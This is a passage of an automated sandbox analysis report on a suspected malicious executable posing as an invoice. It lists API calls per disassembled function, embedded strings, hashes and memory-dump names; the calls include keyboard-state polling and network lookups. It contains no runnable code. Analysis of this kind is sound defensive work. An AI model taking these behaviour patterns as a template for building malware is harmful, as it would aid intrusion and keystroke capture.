                              • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                              • String ID: 0.0.0.0
                              • API String ID: 1965227024-3771769585
                              • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                              • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                              • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                              • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: SendString$_memmove_wcslen
                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                              • API String ID: 369157077-1007645807
                              • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                              • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                              • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                              • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                              APIs
                              • GetParent.USER32 ref: 00445BF8
                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                              • __wcsicoll.LIBCMT ref: 00445C33
                              • __wcsicoll.LIBCMT ref: 00445C4F
                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __wcsicoll$ClassMessageNameParentSend
                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                              • API String ID: 3125838495-3381328864
                              • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                              • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                              • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                              • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                              APIs
                              • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                              • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                              • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                              • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                              • SendMessageW.USER32(?,00000402,?), ref: 00449399
                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$CharNext
                              • String ID:
                              • API String ID: 1350042424-0
                              • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                              • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                              • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                              • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                              APIs
                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                              • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                              • _wcscpy.LIBCMT ref: 004787E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                              • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                              • API String ID: 3052893215-2127371420
                              • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                              • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                              • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                              • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                              APIs
                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                              • __swprintf.LIBCMT ref: 0045E7F7
                              • _wprintf.LIBCMT ref: 0045E8B3
                              • _wprintf.LIBCMT ref: 0045E8D7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                              • API String ID: 2295938435-2354261254
                              • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                              • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                              • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                              • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __swprintf_wcscpy$__i64tow__itow
                              • String ID: %.15g$0x%p$False$True
                              • API String ID: 3038501623-2263619337
                              • Opcode ID: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                              • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                              • Opcode Fuzzy Hash: 1bd516ca49f477e8a3ed3b5693b6511736bfb32664ccdf6525c3e88e5b2a74d5
                              • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                              APIs
                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                              • __swprintf.LIBCMT ref: 0045E5F6
                              • _wprintf.LIBCMT ref: 0045E6A3
                              • _wprintf.LIBCMT ref: 0045E6C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                              • API String ID: 2295938435-8599901
                              • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                              • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                              • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                              • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                              APIs
                              • timeGetTime.WINMM ref: 00443B67
                                • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                              • Sleep.KERNEL32(0000000A), ref: 00443B9F
                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                              • SetActiveWindow.USER32(00000000), ref: 00443BEC
                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                              • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                              • Sleep.KERNEL32(000000FA), ref: 00443C2D
                              • IsWindow.USER32(00000000), ref: 00443C3A
                              • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                              • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                              • String ID: BUTTON
                              • API String ID: 1834419854-3405671355
                              • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                              • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                              • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                              • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                              • LoadStringW.USER32(00000000), ref: 00454040
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • _wprintf.LIBCMT ref: 00454074
                              • __swprintf.LIBCMT ref: 004540A3
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                              • API String ID: 455036304-4153970271
                              • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                              • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                              • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                              • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                              APIs
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                              • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                              • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                              • _memmove.LIBCMT ref: 00467EB8
                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                              • _memmove.LIBCMT ref: 00467F6C
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                              • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                              • String ID:
                              • API String ID: 2170234536-0
                              • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                              • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                              • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                              • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                              APIs
                              • GetKeyboardState.USER32(?), ref: 00453CE0
                              • SetKeyboardState.USER32(?), ref: 00453D3B
                              • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                              • GetKeyState.USER32(000000A0), ref: 00453D75
                              • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                              • GetKeyState.USER32(000000A1), ref: 00453DB5
                              • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                              • GetKeyState.USER32(00000011), ref: 00453DEF
                              • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                              • GetKeyState.USER32(00000012), ref: 00453E26
                              • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                              • GetKeyState.USER32(0000005B), ref: 00453E5D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                              • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                              • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                              • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                              APIs
                              • GetDlgItem.USER32(?,00000001), ref: 004357DB
                              • GetWindowRect.USER32(00000000,?), ref: 004357ED
                              • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                              • GetDlgItem.USER32(?,00000002), ref: 0043586A
                              • GetWindowRect.USER32(00000000,?), ref: 0043587C
                              • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                              • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                              • GetWindowRect.USER32(00000000,?), ref: 004358EE
                              • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                              • GetDlgItem.USER32(?,000003EA), ref: 00435941
                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$ItemMoveRect$Invalidate
                              • String ID:
                              • API String ID: 3096461208-0
                              • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                              • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                              • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                              • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                              APIs
                              • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                              • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                              • DeleteObject.GDI32(?), ref: 0047151E
                              • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                              • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                              • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                              • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                              • DeleteObject.GDI32(?), ref: 004715EA
                              • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                              • String ID:
                              • API String ID: 3218148540-0
